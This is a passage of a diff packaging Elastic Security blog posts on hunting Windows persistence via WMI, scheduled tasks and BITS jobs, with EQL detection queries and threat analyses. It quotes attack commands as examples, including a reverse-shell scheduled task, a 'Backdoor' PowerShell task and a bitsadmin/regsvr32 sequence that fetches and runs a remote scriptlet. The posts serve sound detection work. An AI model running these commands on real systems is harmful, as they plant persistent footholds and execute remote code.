Jobs ([T1197](https://attack.mitre.org/techniques/T1197/)) and Scheduled Tasks ([T1053](https://attack.mitre.org/techniques/T1053/)). This follow-up post will walk through real world examples of these techniques being used and how we can hunt for, detect, and prevent them using Elastic Security.\n\nThe Protections team at Elastic Security is responsible for researching, understanding, and developing detections and preventions for attacker behavior in order to stop attacks before damage or loss occur. For organizations that do not have a full-time security operations team, Elastic Security includes out-of-the-box protections against adversary tradecraft, malware, and attacks like ransomware and phishing.\n\n## What is persistence and why do attackers need it?\n\nWhen we consider the common components of an intrusion, such as those depicted in Figure 1, the attacker may have spent a considerable amount of effort carrying out reconnaissance, obtaining initial access to, and establishing a foothold in their target environment. Generally speaking, an adversary will often want to maintain a presence in order to survive disruptions to their access like system restarts or user password changes. An effective persistence mechanism will execute the attacker’s malicious code on a regular basis or when a specific condition is met such as a user logon or application launch event.\n\nIn many cases, gaining access to an organization’s network is harder than maintaining persistence. It is for this reason that attackers continue to use the persistence techniques covered in this post — with largely successful results. When the security industry refers to “dwell time,” that's the period of time that begins when an adversary gains access to a system and ends when you detect them. Persistence facilitates longer dwell times, during which the adversary can work to achieve their objectives.\n\n\n\nThere are currently [63 persistence techniques](https://attack.mitre.org/tactics/TA0003/) documented in the [MITRE ATT&CK®](https://attack.mitre.org/) knowledge base of adversary behavior. This number can seem daunting at first, but an adversary’s need for persistence can be their Achilles’ heel, providing defenders with valuable opportunities to detect and remove an attacker from their environment.\n\nBy learning these offensive tactics, techniques, and procedures (TTPs) and baselining the endpoints and network activity in your environment, you have an opportunity to detect attackers early on in an intrusion before any damage or loss occurs. Security operations teams work tirelessly to detect the techniques captured in the ATT&CK matrix — hunting and writing alert logic to provide the greatest visibility and coverage of their enterprise. To help reduce the barrier to entry and enable those teams, we created EQL and released it to the community.\n\n## What is Event Query Language (EQL)?\n\nThe queries in this blog post, which can be used for threat hunting and detection, are written in EQL — a powerful and intuitive query language that makes it easy for practitioners to search for complex adversary behavior.\n\nTo learn more about EQL, you can read the [Getting started with EQL](https://www.elastic.co/blog/getting-started-eql) blog post or review the [EQL Analytics Library](https://eqllib.readthedocs.io/en/latest/analytics.html), which contains 200+ free security analytics mapped to the techniques documented in the MITRE ATT&CK matrix. EQL is a core component of Elastic Endpoint Security and [is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581) for use in Elastic SIEM.\n\nLet’s now analyze the WMI Event Subscription technique used by attackers in the wild by demonstrating a variety of methods to hunt for and detect this technique. We decided to cover this technique given its popularity among attackers and the low detection rates by traditional security controls.\n\n## Persistence via Windows Management Instrumentation (WMI) Event Subscriptions (T1084)\n\n[WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/about-wmi) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), a collection of technologies used to manage information and systems in enterprise environments. WMI is a built-in feature of Windows endpoints that allows both administrators and attackers to interact and manage many different functions of the operating system. Components such as network interfaces, power settings, service status, and installed software or patches can all be queried and managed via WMI.\n\nAttackers have been abusing WMI since as early as 2008 to accomplish different objectives such as moving laterally between endpoints, enumerating what processes are running on an endpoint, and to maintain persistence. An attacker can “live off the land” by abusing built-in features of the operating system, which often results in a lower risk of detection than if they introduced malware into a victim environment.\n\nIt's no secret that adversaries prefer WMI-based persistence because:\n\n- Many organizations are incapable of monitoring or investigating WMI\n- Out-of-the-box WMI visibility is limited, and a third-party utility may be required to effectively convey how WMI is being used\n- WMI is an integral component of Windows, and the volume of weak signals from this data source can overwhelm analysts who aren't familiar with these attack types\n\nLike most offensive techniques, until organizations can reliably detect WMI abuse, the adversary is unlikely to change their behavior.\n\n### Understanding WMI Event Subscriptions and how they can be abused\n\nSimply put, a WMI Event Subscription can trigger an action when a certain condition is met. A WMI Event Subscription consists of three components.\n\n- EventFilter - specifies a condition that you test for, i.e. a user successfully authenticates, a particular time and day of the week occurs, etc.\n- EventConsumer - specifies an action to execute when the EventFilter condition is met, i.e. execute a Windows command or script, delete all Volume Shadow Copies, restart a service, etc.\n- FilterToConsumerBinding - this links an EventFilter to an EventConsumer instance\n\nFigure 2 below shows the output from Sysinternals Autoruns, a free tool from Microsoft that can be used to examine various persistence locations on Windows endpoints, also referred to as Autostart Execution Points (ASEPs). Autoruns reveals a persistent WMI Event Subscription, named checkforupdates. It is important to note that there are sometimes benign WMI Event Subscriptions configured, but there shouldn’t be many. Alerting on the creation of new WMI Event Subscriptions and hunting for new ones periodically can be a low cost, high reward exercise.\n\n\n\nThe full WMI Query Language (WQL) query from the Autoruns results is shown below. Autoruns conveniently enumerated the WMI \\_\\_EventFilter class for us in the root\\Subscription namespace where this malicious entry was created. Interpreting this WQL query, the EventFilter condition will be met when the system’s uptime is between 240 -325 seconds. The EventConsumer is an [Empire](https://github.com/EmpireProject/Empire) PowerShell script and will execute when this EventFilter condition is met.\n\nTo summarize, a WMI Event Subscription has been configured to execute a malicious PowerShell script shortly after the endpoint boots up. This enables the attacker to maintain persistence in the victim’s environment and survive system restarts.\n\n```\nSELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND\nTargetInstance.SystemUpTime >= 240 AND\nTargetInstance.SystemUpTime < 325\n```\n\n_Figure 3 - WMI Query Language (WQL) query showing WMI EventFilter condition_\n\n### Hunting for and detecting malicious WMI Event Subscriptions\n\nThe EQL query in Figure 4 shows how we can search for a sequence of three WMI events, which were generated by the same unique process ID (PID). This query demonstrates one of the strengths of EQL by using the join function. This allows us to match sequences of events in any order. Searching for these three WMI events without binding them together by unique PID might not return meaningful results. This query matches when a WMI EventFilter, EventConsumer, and FilterToConsumer binding are created by the same process in succession, which typically occurs when malware is executed and creates a new WMI Event Subscription for persistence. This query can be used to monitor for and detect abuse of WMI.\n\n```\njoin by unique_pid\n [wmi where properties.Operation == \"*IWbemServices::PutInstance*EventFilter*\"]\n [wmi where properties.Operation == \"*IWbemServices::PutInstance*EventConsumer*\"]\n [wmi where properties.Operation == \"*IWbemServices::PutInstance*FilterToConsumerBinding*\"]\n```\n\n_Figure 4 - EQL query to search for the creation of a WMI EventFilter, EventConsumer, and FilterToConsumerBinding in succession_\n\nThe above EQL query can be saved as a custom rule in Elastic Endpoint Security so that analysts can be alerted every time a new WMI Event Subscription is created by a process (Figure 5).\n\n\n\nResolver is the primary interface for interacting with alerts in Elastic Endpoint Security and enables users to visualize process ancestry along with relevant events such as DNS, file, network, WMI, and PowerShell, to name a few. It also provides one-click response actions to resolve the alert.\n\n\n\nClicking the WMI event type next to powershell.exe in Resolver enables users to review the WMI events that were generated by the process. Figure 7 shows the WMI event that was logged when powershell.exe was used to create the new WMI FilterToConsumerBinding, checkforupdates.\n\n\n\nElastic Endpoint Security also includes template-based hunts that lower the barriers to entry for less experienced analysts and allows for the easy collection and analysis of data across an organization’s endpoints. There are currently 25 categories of persistence data that can be collected and analyzed using template-based hunts.\n\n\n\nOnce a hunt has been executed, there are several ways to sort or aggregate the data — such as by frequency or file path. This helps analysts to quickly baseline their endpoints and identify anomalies to investigate further.\n\nFigure 9 depicts the filtered results of a persistence hunt wherein the same malicious WMI Event Subscription was configured. Elastic Security enumerates persistence locations across your endpoints and enables users to apply filters to identify anomalies or suspicious artifacts for further analysis. Hunt teams will often assume that traditional passive and reactive security controls are fallible, and will proactively hunt for malicious persistence mechanisms in search for attackers operating in their environment.\n\n\n\nElastic Security comes with out-of-the-box detections for WMI abuse. Figure 10 shows the signal that was generated by Elastic Endpoint and shipped to Elastic SIEM when a malicious WMI Event Subscription was created.\n\n\n\nUsers have the option to view a signal in the Timeline within Elastic SIEM. Timeline enables analysts to search for similar activity across their data, gather and document evidence, and forward potential incidents to ticketing and SOAR platforms with ease. Part 2 of this series will show the workflow and features of Timeline.\n\n\n\nAs of version 7.6 of the Elastic Stack, the SIEM app comes with a detection engine, which enables security teams to create their own custom rules. For example, Windows 10 logs Event ID 5861 when a new WMI EventFilterToConsumer binding is created. Figure 12 shows how a custom rule can be created in Elastic SIEM to search the winlogbeat-\\* index pattern for winlog.record_id: 5861. We can configure a description, severity, and risk score for the new rule, as well as map the rule to the relevant techniques in the MITRE ATT&CK matrix. This information will help an analyst triage and determine the steps to take when the rule condition occurs.\n\n\n\nElastic SIEM is part of the Basic subscription and currently includes 92 detections that utilize Windows, Linux, network, and APM logging. We will continue to add new rules in new releases of the Elastic Stack.\n\n\n\nIn this section, we learned how WMI Event Subscriptions can be abused for persistence and how we can hunt for and detect this technique using the combination of Elastic Endpoint and SIEM. It’s important to note that we have only scratched the surface of how WMI works and the many ways that it can be used by attackers.\n\nWMI can be used during every phase of an attack, such as moving laterally between endpoints, conducting local and enterprise reconnaissance, and stealing data. Elastic Security has released detections for many techniques that leverage WMI.\n\n## Conclusion\n\nIn this blog post, we examined a popular technique that attackers use to maintain a presence in their target environments. The number of techniques in an attacker’s arsenal can seem daunting at first, but we demonstrated a formulaic approach to examining, hunting for, and detecting techniques effectively. By building comprehension around adversary tradecraft, you can identify interesting patterns, behaviors, and artifacts that you can use to your advantage.\n\nElastic Security makes hunting for persistence easy. The features of Elastic Endpoint Security and SIEM (along with the protections provided out of the box) lower the barriers to entry for analysts, provide detailed visibility into endpoint activity, and enable organizations to prevent, detect, and respond to malicious behavior at scale.\n\nTo learn more about threat hunting, download a free copy of [The Elastic Guide to Threat Hunting](https://ela.st/threat-hunting).\n\nPlus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!\n"
+ },
+ "title": "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)",
+ "slug": "hunting-for-persistence-using-elastic-security-part-1",
+ "date": "2022-06-01",
+ "description": "Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.",
+ "author": [
+ {
+ "slug": "david-french"
+ },
+ {
+ "slug": "brent-murphy"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-security-breach-red-lock.jpg",
+ "category": [
+ {
+ "slug": "adversary"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_for_persistence_using_elastic_security_part_1-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md.json
new file mode 100644
index 00000000000..33fbcffff5e
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md.json
@@ -0,0 +1,30 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)\"\nslug: \"hunting-for-persistence-using-elastic-security-part-2\"\ndate: \"2022-06-21\"\ndescription: \"Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.\"\nauthor:\n - slug: brent-murphy\n - slug: david-french\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-shattered-lock.jpg\"\ncategory:\n - slug: adversary\n---\n\nIn Part 2 of this two-part series, our goal is to provide security practitioners with better visibility, knowledge, and capabilities relative to malicious persistence techniques that impact organizations around the world every day.\n\n[Part 1](https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1) explained what persistence is and why attackers need it. It introduced the Event Query Language ([EQL](https://www.elastic.co/blog/getting-started-eql)) before showing its practical use cases for threat hunting. Finally, it examined a popular technique used by adversaries to maintain persistence, Windows Management Instrumentation (WMI) Event Subscription ([T1084](https://attack.mitre.org/techniques/T1084/)). We shared how [Elastic Security](https://www.elastic.co/security) users can hunt for and detect this technique being used in their environment.\n\nIn this post, we’ll explore two additional persistence techniques that are being used by attackers in the wild: Scheduled Tasks ([T1053](https://attack.mitre.org/techniques/T1053/)) and BITS Jobs ([T1197](https://attack.mitre.org/techniques/T1197/)). This blog assumes you've already learned a little EQL as we walk through real-world examples and provide ready-to-use detection logic for each technique.\n\n## Persistence via scheduled tasks (T1053)\n\nWindows provides a built-in utility called schtasks.exe that allows you to create, delete, change, run, and end tasks on a local or remote computer. Scheduled tasks run at an elevated privilege level, which means this persistence mechanism can indirectly satisfy privilege escalation (TA0004) as well. It’s important to be aware of scheduled tasks that exist in your environment (such as maintenance or backup tasks) as well as tasks created during the installation of new software (like PDF readers or browsers). It's also essential for security teams to baseline their environment, as knowing all the legitimate ways that scheduled tasks are used will help you become a more effective hunter and identify anomalies more quickly.\n\nAn adversary may attempt to abuse scheduled tasks to execute programs at startup or on a regular cadence for persistence. Threat actors like [APT34](https://attack.mitre.org/groups/G0049/), [APT29](https://attack.mitre.org/groups/G0016/), and [FIN6](https://attack.mitre.org/groups/G0037/) have been known to use scheduled tasks as a means to persist. Figure 1 depicts some of the command line parameters available to schtasks.exe, which we can use as references when analyzing task creation events.\n\n```\n/Create - creates a new scheduled task\n/RU - specifies the \"run as\" user account\n/SC - specifies the schedule frequency\n/TN - specifies the string in the form of path\\name which uniquely identifies this scheduled task\n/TR - specifies the path and file name of the program to be run at the scheduled time\n/MO - specifies how often the task runs within its schedule type\n/F - forcefully creates the task and suppresses warnings if the specified task already exists\n```\n\n_Figure 1 - Portion of Windows schtasks.exe available command line parameters_\n\nFigure 2 shows an example of a schtasks.exe command. [This example](https://lolbas-project.github.io/lolbas/Binaries/Schtasks/) is from the popular [Living Off The Land Binaries and Scripts (LOLBAS)](https://lolbas-project.github.io/) project that demonstrates how built-in, trusted Operating System utilities can be abused by adversaries to achieve their objectives. By looking at the command line parameters in the example, the task named Reverse Shell is configured to execute the binary C:\\some\\directory\\revshell.exe every minute.\n\n```\nschtasks /create /sc minute /mo 1 /tn \"Reverse shell\" /tr C:\\some\\directory\\revshell.exe /create /sc minute /mo 1 /tn \"Reverse shell\" /tr C:\\some\\directory\\revshell.exe\n```\n\n_Figure 2 - Example of scheduled task creation using schtasks.exe_\n\nWindows PowerShell also includes several [ScheduledTasks cmdlets](https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/?view=win10-ps) that can be used to create and manage scheduled tasks on Windows endpoints. Security teams can hunt for suspicious usage of these cmdlets including the ones listed in Figure 3. Organizations that have already deployed PowerShell 5.0 should consider monitoring suspicious script block logging events, Event ID 4104. A good resource on PowerShell visibility and recommended log sources to monitor can be found [here](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html).\n\n```\nNew-ScheduledTaskAction - creates a scheduled task action\nNew-ScheduledTaskTrigger - creates a scheduled task trigger object\nRegister-ScheduledTask - registers a scheduled task definition on a local computer\n```\n\n_Figure 3 - Common PowerShell cmdlets for scheduled task creations_\n\nFigure 4 shows how these PowerShell cmdlets can be used to create and register a scheduled task.\n\n```\nPS C:\\> $A = New-ScheduledTaskAction -Execute \"cmd.exe\" -Argument \"/c C:\\Windows\\Temp\\backdoor.exe\"\nPS C:\\> $T = New-ScheduledTaskTrigger -Daily -At 9am\nPS C:\\> $D = New-ScheduledTask -Action $A -Trigger $T\nPS C:\\> Register-ScheduledTask Backdoor -InputObject $D\n```\n\n_Figure 4 - PowerShell cmdlets being used to create and register a scheduled task_\n\n## Real-world example: APT34 scheduled tasks abuse\n\nAs mentioned previously, APT34, a highly organized and technical state-sponsored threat group, is known to use scheduled tasks for persistence. The following visualization (Figure 5) depicts one of the ways a scheduled task can be used. In this case, we’re seeing the result of a victim opening a phishing lure (Step 1) — attributed to the APT34 threat group — via the Resolver view. Resolver is a critical enabler for security practitioners, as discussed in [Part 1](https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1). In this example, the following behaviors can be observed:\n\n- A malicious macro, embedded within a Microsoft Word document, was opened (Step 2)\n- Upon opening the Word document and executing the malicious macro, the native Windows script interpreter (wscript.exe) executed a script introduced by the adversary (Step 3)\n- The script created a callback to C2 while also establishing persistence via a scheduled task (Step 4)\n\n\n\nFigure 6 depicts the command line arguments parsed from the malicious scheduled task. Every minute, the native Windows Script Host utility, wscript.exe, will execute the malicious VBScript file, AppPool.vbs, which resides in the ProgramData subdirectory.\n\n\n\n## Hunting for scheduled tasks\n\nWith an understanding of the technique, observable artifacts, and common attributes of schtasks.exe execution, we're better prepared to succeed in our hunt for malicious scheduled task creation events. The EQL query in Figure 7 matches event sequences where the task scheduler process, schtasks.exe, is created by one of several commonly abused binaries and matches some of the command line parameters previously described. By uniquing on the command line, this allows us to focus our hunt on unique task creations and their properties.\n\nThis query matches behaviors described in our earlier APT34 example, in which schtasks.exe descended from wscript.exe. Windows script host (WSH) is a script interpreter and should generally not have many descendants. In this case, it indicates that WSH was used to interpret a JScript or VBScript object that directly or by proxy implemented a scheduled task using schtasks.exe. This EQL query can also be saved as a custom rule in Elastic Endpoint Security so that analysts can be alerted every time this activity occurs.\n\n```\nprocess where subtype.create and\n process_name == \"schtasks.exe\" and\n descendant of\n [process where process_name in (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\")] and\n command_line == \"* /create*\" and\n wildcard(command_line, \"*/RU*\", \"*/SC*\", \"*/TN*\", \"*/TR*\", \"*/F*\")\n| unique command_line\n```\n\n_Figure 7 - EQL query to search for the creation of schtasks.exe as a descendant of commonly abused processes_\n\nIn [Elastic SIEM](https://www.elastic.co/siem), we can search for the use of the scheduled tasks utility and drag and drop fields of interest into the responsive Timeline (Figure 8) for further investigation. Data from multiple indices, or data sources, can be added to the [Timeline](https://www.elastic.co/guide/en/siem/guide/current/siem-ui-overview.html) view, which enables analysts to organize leads and investigate complex threats. [Version 7.6](https://www.elastic.co/blog/elastic-stack-7-6-0-released) introduced a detection engine that included 92 out-of-the-box rules for detection in Windows, Linux, network, and APM telemetry — as well as enabling users to create their own custom rules.\n\n\n\n## Other scheduled task considerations\n\nScheduled tasks may not seem sophisticated, but they are a great example of how hunters must understand the various ways that an adversary can schedule a task on a system. When shallowly monitoring a technique (i.e., only looking for use of schtasks.exe), a team can easily lull itself into a false sense of security. Understanding adversary tradecraft and having access to the relevant telemetry is crucial for successful threat hunting.\n\nIt’s important to note that there are many other ways scheduled tasks can be abused by adversaries, including offensive security tools, custom scripts, .job files, the AT command, and directly via the [Task Scheduler API](https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-reference). Elastic Security provides detections and preventions for various TTPs related to scheduled task abuse and provides API-level visibility.\n\nIn the next section, we’ll analyze BITS jobs, how they are used by attackers in the wild, and a variety of methods to identify or detect this technique.\n\n## Persistence via BITS jobs (T1197)\n\nWindows [Background Intelligent Transfer Service (BITS)](https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) is a built-in framework used to transfer files to and from web and SMB servers. Microsoft provides a utility called bitsadmin.exe and PowerShell cmdlets for managing the transfer of files.\n\nMicrosoft uses BITS to download and install updates in the background — using idle bandwidth. For example, if a user starts a Windows Update and signs out of the computer, or if a network connection is lost, BITS will resume the download automatically as soon as it is able. The capability to survive reboots makes it an ideal tool for attackers to transfer malicious files and possibly large volumes of data the actor plans to steal. Threat groups like [APT40](https://attack.mitre.org/groups/G0065/) and malware families such as the Qbot banking trojan have used BITS to transfer malicious files and set up persistence.\n\nFigure 9 shows some [parameters](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin) that can be used with bitsadmin.exe. We can identify interesting activity by focusing on creation and transfer command line options.\n\n```\n/create - creates a transfer job with the given display name\n/addfile - adds a file to the specified job\n/resume - activates a new or suspended job in the transfer queue\n/transfer - transfers one or more files\n/SetNotifyCmdLine - sets the command that will run when the job finishes transferring data or when a job enters a state\n/SetMinRetryDelay - sets the minimum length of time, in seconds, that BITS waits after encountering a transient error before trying to transfer the file\n```\n\n_Figure 9 - Parameters that can be used with the Windows bitsadmin.exe utility_\n\nFigure 10 shows an example of how the above parameters can be used to create a BITS job. The below example from the [bitsadminexec](https://github.com/3gstudent/bitsadminexec) project demonstrates how bitsadmin.exe can be used to execute the Squiblydoo technique, discovered by [Casey Smith](https://twitter.com/subTee). Squiblydoo utilizes regsvr32.exe to download an XML file that contains scriptlets for executing code on the victim machine. This [sample](https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct) executes calc.exe, but it’s a good use case for how this could be used maliciously:\n\n```\n# create backdoor\nbitsadmin /create backdoor\nbitsadmin /addfile backdoor %comspec% %temp%\\cmd.exe\nbitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe \"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll\"\nbitsadmin /Resume backdoor\n```\n\n_Figure 10 - Example of using bitsadmin.exe to execute Squiblydoo_\n\nSince BITS [version 4.0](https://docs.microsoft.com/en-us/windows/win32/bits/what-s-new) (standard in Windows Server 2008 R2 and Windows 7), PowerShell cmdlets can also be used to create and manage file transfer jobs. The PowerShell [cmdlets](https://docs.microsoft.com/en-us/windows/win32/bits/bits-powershell-commands) for BITS provide much of the same functionality as the bitsadmin.exe command line utility, a subset of which are depicted in Figure 11:\n\n```\nAdd-BitsFile - add one or more files to a BITS transfer\nResume-BitsTransfer - resumes a suspended BITS transfer job\nSet-BitsTransfer - modifies the properties of a BITS transfer job\nStart-BitsTransfer - create and start a BITS transfer job\n```\n\n_Figure 11 - Common PowerShell cmdlets for BITS_\n\nA good cmdlet to monitor is Start-BitsTransfer. The local and remote names of the file are specified in the Source and Destination parameters. This can be depicted as seen in Figure 12. As stated previously, analysts should monitor suspicious script block logging events, Event ID 4104, in the Microsoft-Windows-PowerShell/Operational log.\n\n\n\n## Hunting for malicious BITS jobs\n\nThe EQL query in Figure 13 demonstrates some of the command line arguments you might see while hunting for malicious use of bitsadmin.exe. The query searches for a process creation event for the bitsadmin.exe binary and the common command line parameters associated with the creation or transfer of a BITS job, and returns unique results based on the command line value. Focusing on unique results while hunting allows us to narrow our focus and more easily spot anomalous activity.\n\n```\nprocess where subtype.create and\n process_name == \"bitsadmin.exe\" and\n wildcard(command_line, \"*Transfer*\", \"*Create*\", \"*AddFile*\", \"*SetNotifyCmdLine*\",\n \"*SetMinRetryDelay*\", \"*Resume*\")\n| unique command_line\n```\n\n_Figure 13 - EQL query looking for common bitsadmin.exe command line parameters_\n\nAdditionally, during rule creation, you have the option to enable a \"Reflex Response.\" With “Reflex Response,” if such behavior defined in a custom rule is detected, it uses Endpoint Security’s unique telemetry-gathering and enrichment to execute an automated response before damage and loss can occur (Figure 14). This functionality enables analysts to take action to stop the malicious behavior and then investigate the events that led up to and occurred after the threat, as opposed to investigating a current threat that may be past the point of remediation.\n\n\n\nExecuting an EQL hunt in the Endpoint Security product using the EQL query from above can lead to finding real-world campaigns like Qbot, shown in Figure 15.\n\n\n\n## Real-world example: Qbot malware\n\nQBot is a widely distributed banking Trojan that is capable of self-replication and has historically relied on PowerShell. Recently, however, it may have been [abandoned](https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/) in favor of bitsadmin.exe — an application unlikely to be scrutinized as aggressively.\n\nThis variant utilizes a .vbs dropper by masquerading as a .doc file, as Windows still hides the original filename extension by default. Upon execution, in this case via the parent process wscript.exe, the malware spawns bitsadmin.exe to create a transfer job that downloads a subsequent payload, shown in the Timeline view in the SIEM app (Figure 16).\n\n\n\nAnalyzing the process.args field values as depicted in Figure 17 reveals that the malware takes the following actions:\n\n- Creates a randomly named transfer job with high priority\n- Uses bitsadmin.exe to download its second stage payload from a command & control (C2) server (Note that widgetcontrol.png is actually a Windows executable)\n- Base64 encodes data on the endpoint’s operating system version and antivirus software, which it passes back to C2 in the beacon URI\n- Randomizes the name of the payload and writes it to a subfolder of the %AppData% path\n\n\n\nThis example showcases how bitsadmin.exe can be used by threat actors to attempt to bypass traditional defenses by using a less common, built-in utility. This application is effectively used by threat actors for transferring files and maintaining a presence in a victim environment.\n\n## Others BITS and pieces\n\nThe Microsoft_Windows_Bits_Cient Operational.evtx log file is a native Microsoft event log. It records every operation executed by the BITS client, either via bitsadmin.exe or PowerShell. Within that log store, Event ID 3 is used when The BITS service creates a new job. [Winlogbeat](https://www.elastic.co/downloads/beats/winlogbeat) can be configured to monitor that event.provider as shown in Figure 18. Elastic Security provides telemetry, detections, and threat hunting capabilities for BITS abuse at enterprise scale.\n\n\n\n## Conclusion\n\nIn this blog series, we examined popular techniques that attackers use to maintain a presence in their target environments. The number of techniques in an attacker’s arsenal can seem daunting at first, but we demonstrated a formulaic approach to examining, hunting for, and detecting techniques effectively. By building comprehension around adversary tradecraft, you can identify interesting patterns, behaviors, and artifacts that you can use to your advantage.\n\nElastic Security makes hunting for persistence easy. The features of Elastic Endpoint Security and SIEM — along with the protections provided out of the box — lower the barriers to entry for analysts, provides detailed visibility into endpoint activity, and enables organizations to prevent, detect, and respond to malicious behavior at scale.\n\nTry [Elastic SIEM](https://www.elastic.co/security/siem) for free today. To learn more about threat hunting, download a free copy of [The Elastic Guide to Threat Hunting](https://ela.st/threat-hunting).\n\nView our webinar on [Hunting for persistence using Elastic Security](https://www.elastic.co/webinars/hunting-for-persistence-using-elastic-security).\n\nPlus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!\n"
+ },
+ "title": "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)",
+ "slug": "hunting-for-persistence-using-elastic-security-part-2",
+ "date": "2022-06-21",
+ "description": "Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale.",
+ "author": [
+ {
+ "slug": "brent-murphy"
+ },
+ {
+ "slug": "david-french"
+ },
+ {
+ "slug": "elastic-security-intelligence-analytics-team"
+ }
+ ],
+ "image": "blog-thumb-shattered-lock.jpg",
+ "category": [
+ {
+ "slug": "adversary"
+ }
+ ]
+ },
+ "id": "security_labs_content-hunting_for_persistence_using_elastic_security_part_2-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md.json
new file mode 100644
index 00000000000..3f49478be82
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-hunting_for_suspicious_windows_libraries_for_execution_and_evasion-md.json
@@ -0,0 +1,35 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Hunting for Suspicious Windows Libraries for Execution and Defense Evasion\"\nslug: \"Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion\"\ndate: \"2023-03-01\"\ndescription: \"Learn more about discovering threats by hunting through DLL load events, one way to reveal the presence of known and unknown malware in noisy process event data.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"blog-thumb-roman-columns.jpg\"\ncategory:\n - slug: security-operations\n - slug: security-research\n - slug: detection-science\ntags:\n - detection engineering\n - threat hunting\n - threat detection\n---\n\nDynamic-link library (DLL) image loads is one of the noisiest types of event in Windows, which may discourage defenders from using it for detection engineering or threat hunting. Even if logged in some environments, it’s often limited to function-specific DLLs such as scheduled tasks (taskschd.dll), Windows Management Instrumentation (wmiutil.dll) and potentially DLLs loading from a few suspicious folders. In addition to the data volume issue, the false positive (FP) rate of the detection rules using DLL events also tend to be proportional to the data volume.\n\nUnfortunately, both advanced adversaries and also commodity malwares are taking advantage of those limitations to increase the chances of their attack success, especially during the delivery phase via diverse spear phishing procedures.\n\nThe most commonly observed delivery techniques are the following :\n\n- Loading malicious DLLs using binary execution proxies Rundll32 and Regsvr32\n- Sideloading a malicious DLL from a virtual disk image (ISO/VHD files) into a convenient signed benign binary\n- Extracting a DLL from a malicious Microsoft Office document (i.e. Word, Excel) and immediately loading it via Visual Basic for Applications (VBA)\n- Downloading or extracting a DLL using a [lolbin](https://lolbas-project.github.io/) and loading it by another program\n- Sideloading a malicious DLL extracted from a compressed archive (zip, rar, etc) into a signed benign binary\n- Dropping a malicious DLL in the current directory of an existing program vulnerable to DLL sideloading (e.g. OneDrive, Slack, Teams) via one of several means\n- Less common but also very effective is the use of Windows Installer MSIEXEC to load a malicious DLL\n\n# What DLL events do we log with Elastic Endpoint ?\n\nWith the exception of the following Microsoft DLLs, Elastic endpoint since version 7.16 records all non-Microsoft signed DLLs: \n\nWe also added some enrichments to both DLL and process events that records the following metadata: \n\nBelow is an example of device information for DLL and Process execution from mounted ISO and VHD files, two file objects increasingly used to deliver malware: \n\nHere is an example of process execution relative file creation and modification times for svchost.exe : \n\nThe relative execution time enrichment will help us create less noisy detection rules (we can match our rules against the first or few image load or process execution instances), and the device information will allow us to better target suspicious use of ISO/VHD files for malicious purposes.\n\n# Detection\n\nIn this section we share some detection ideas that are both reliable signals and effectively match the most common scenarios we mentioned earlier.\n\n## DLL via Rundll32 / Regsvr32\n\nAs captured in our own [Global Threat Report](https://www.elastic.co/security-labs/2022-elastic-global-threat-report-announcement), Rundll32 and Regsvr32 lolbins are two of the most abused binary execution proxies. These utilities can load malicious DLLs and are a commonly seen component of many phishing attacks (malicious shortcuts, ISO file, macro enabled documents): \n\nDuring a recent period of about 90 days, our internal malware sandbox saw roughly 21K malware alerts where the malicious file was a DLL loaded by either regsvr32 or to a lesser degree rundll32.\n\nThe following two endpoint behavior protection rules are effective against about 80% of those samples (~17k out of ~21k) leveraging rundll32 or regsvr32 to execute malicious modules: - [Unusual DLL Extension Loaded by Rundll32 or Regsvr32](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_unusual_dll_extension_loaded_by_rundll32_or_regsvr32.toml)- [RunDLL32/Regsvr32 Loads Dropped 